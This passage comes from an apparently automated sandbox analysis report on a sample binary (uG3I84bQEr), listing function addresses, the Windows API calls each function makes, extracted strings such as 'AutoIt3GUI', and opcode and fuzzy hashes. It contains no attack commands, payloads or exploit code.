Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94

Function 0045B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0045B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
_wcsstr.LIBCMT ref: 0045B289

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 6cc66ac60d2af55151ee0b8dc61b89e065b9431517b95cd5b538a8562ff810f2
Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
Opcode Fuzzy Hash: 6cc66ac60d2af55151ee0b8dc61b89e065b9431517b95cd5b538a8562ff810f2
Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8

Function 0048B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

GetWindowLongW.USER32(?,000000F0), ref: 0048B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
GetSystemMetrics.USER32(00000004), ref: 0048B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98

Function 00459307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
__itow.LIBCMT ref: 0045936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
__itow.LIBCMT ref: 004593A3

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A

Function 004012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
SelectObject.GDI32(?,00000000), ref: 0040135C
BeginPath.GDI32(?), ref: 00401373
SelectObject.GDI32(?,00000000), ref: 0040139C

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9

Function 00464A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00464ABA
__beginthreadex.LIBCMT ref: 00464AD8
MessageBoxW.USER32(?,?,?,?), ref: 00464AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9

Function 00B918DF Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000008,?,?,00B915D8,00B93CBB,?,00B91D2A,?,?,00000000), ref: 00B918E4
_free.LIBCMT ref: 00B91919
_free.LIBCMT ref: 00B91940
SetLastError.KERNEL32(00000000,?,00B91D2A,?,?,00000000), ref: 00B9194D
SetLastError.KERNEL32(00000000,?,00B91D2A,?,?,00000000), ref: 00B91956

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 66107a865d519143db3ee56065088dcf2536c466b02beb16f19c60013719b870
Instruction ID: d4e96a4b6640e8cbcba780ff3e60a321e8c6417e17b5151722f47ab89e197e69
Opcode Fuzzy Hash: 66107a865d519143db3ee56065088dcf2536c466b02beb16f19c60013719b870
Instruction Fuzzy Hash: 4801D1366006037B9F1267796D9AE7B26DDDBC237472108B5F915A3293FE758803A061

Function 00458202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64

Function 0045710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4

Function 00465244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA

Function 0045810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64

Function 0045C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
MessageBeep.USER32(00000000), ref: 0045C226
KillTimer.USER32(?,0000040A), ref: 0045C242
EndDialog.USER32(?,00000001), ref: 0045C25C

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59

Function 00B93171 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B93189

Part of subcall function 00B92096: HeapFree.KERNEL32(00000000,00000000,?,00B93208,?,00000000,?,00000000,?,00B9322F,?,00000007,?,?,00B92697,?), ref: 00B920AC
Part of subcall function 00B92096: GetLastError.KERNEL32(?,?,00B93208,?,00000000,?,00000000,?,00B9322F,?,00000007,?,?,00B92697,?,?), ref: 00B920BE

_free.LIBCMT ref: 00B9319B
_free.LIBCMT ref: 00B931AD
_free.LIBCMT ref: 00B931BF
_free.LIBCMT ref: 00B931D1

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0851a5d57d8728fad3b866e6d99094edfa83cb0adf197db9a3a51d30f0eb753a
Instruction ID: c696920e884b9ece862c046d3797fdb75a160974f11465b8223bc3390f343a5b
Opcode Fuzzy Hash: 0851a5d57d8728fad3b866e6d99094edfa83cb0adf197db9a3a51d30f0eb753a
Instruction Fuzzy Hash: 6AF06232900210BB8E34EB64F8C2C2673E9FA00B5075408A9F449E7612CB30FD80CA60

Function 004013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 004013BF
StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
SelectObject.GDI32(?,00000000), ref: 004013EE
DeleteObject.GDI32 ref: 00401401
StrokePath.GDI32(?), ref: 0040141C

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28

Function 00412CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB

__swprintf.LIBCMT ref: 00412ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 2233712eb4bf0390e9830eca6b547194fd182ef3ee55646a6909b3329085d77f
Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
Opcode Fuzzy Hash: 2233712eb4bf0390e9830eca6b547194fd182ef3ee55646a6909b3329085d77f
Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A

Function 0045B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE

Strings

%I, xrefs: 0045B561
Container, xrefs: 0045B43B
AutoIt3GUI, xrefs: 0045B436

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%I
API String ID: 3565006973-4251005282
Opcode ID: 062e79ac20f775a6682f03866d4de74e978744786b19c4cb35eeb0bad5a62688
Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
Opcode Fuzzy Hash: 062e79ac20f775a6682f03866d4de74e978744786b19c4cb35eeb0bad5a62688
Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4

Function 0042501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004250AD

Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B

Strings

pow, xrefs: 00425085, 004250A2

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
